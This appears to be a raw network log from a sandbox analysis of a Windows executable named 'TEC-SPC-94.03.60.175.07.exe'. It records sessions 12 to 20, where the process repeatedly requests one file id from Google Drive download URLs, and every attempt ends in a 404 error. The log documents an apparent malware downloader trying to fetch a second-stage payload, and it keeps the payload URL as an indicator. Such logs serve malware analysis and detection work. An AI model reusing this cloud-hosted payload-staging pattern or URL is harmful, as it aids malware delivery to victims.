                                                        Content-Security-Policy: script-src 'nonce-mV48Bs3rtx-9UWh8K119sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:07 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1LhuQcfy-m8K09CCO5XsWw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        12 | 192.168.2.6 | 49863 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:09 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:10 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:09 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-sfq__Lw9K2jxxD5gr2niWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        13          192.168.2.6  49874        142.250.181.1   443               4420  C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:58:12 UTC  460                OUT        GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:13 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6lRNZc6u7DJPO2HzKnuWftVgwaVWAIKGIlYgL1a_ZIcerDNNpfhSpbx7-pG4zARFrZ
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:12 GMT
                                                        Content-Security-Policy: script-src 'nonce-fCxnZETHthfpMs051sAoHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:13 UTC  1652               IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vgqjenvaj6LioPa0vWWGXg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        14          192.168.2.6  49880        172.217.19.174  443               4420  C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:58:14 UTC  418                OUT        GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:15 UTC  1920               IN         HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:15 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-W1WemoriBuqAL-nzFoXumg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        15          192.168.2.6  49886        142.250.181.1   443               4420  C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:58:17 UTC  460                OUT        GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:18 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC70sfg7GGe-rm1nh9YPmU_wWbI51LQ_M26X60qUXXEgtkVx_EnBAXMAO1lD0Educ1VO
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:18 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-QRQeOCPHesK7WpgSOgqZdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:18 UTC  1652               IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nivis72b66fnY5NCFW_hoQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        16          192.168.2.6  49893        172.217.19.174  443               4420  C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:58:20 UTC  418                OUT        GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:21 UTC  1920               IN         HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:20 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-z0R4eIR1cZGaollvr0t2pQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        17          192.168.2.6  49901        142.250.181.1   443               4420  C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:58:23 UTC  460                OUT        GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:24 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC7ENJUW9YDNtqr91CXExvPDiKec78JJ-aSJG3E6-CbMaWA6RXmxY9pvwZNBmVRpXON5
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:23 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-6m_NedVDerj5VWVdAx2a7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:24 UTC  1652               IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="az3DFD65jw3NqfdeYJnkXA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        18          192.168.2.6  49909        172.217.19.174  443               4420  C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:58:25 UTC  418                OUT        GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:26 UTC  1920               IN         HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:26 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-rb44_5NNu2InLcRyuCFZPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                        19          192.168.2.6  49915        142.250.181.1   443               4420  C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-16 16:58:28 UTC  460                OUT        GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:29 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4Rn3ZSk2YusbqWeC-xe0HlNwUBSdJEsh5dulQ-8fhZ6y-S5IYzKnUCtespAhAbDKwN
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:29 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-cKUTA4beyHyle-T6IgySpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:29 UTC | 1652 | IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Nf1iXJThY2fPQrUVIM-dJg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        20 | 192.168.2.6 | 49920 | 172.217.19.174 | 443 | 4420 | C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:31 UTC | 418 | OUT | GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:32 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:31 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
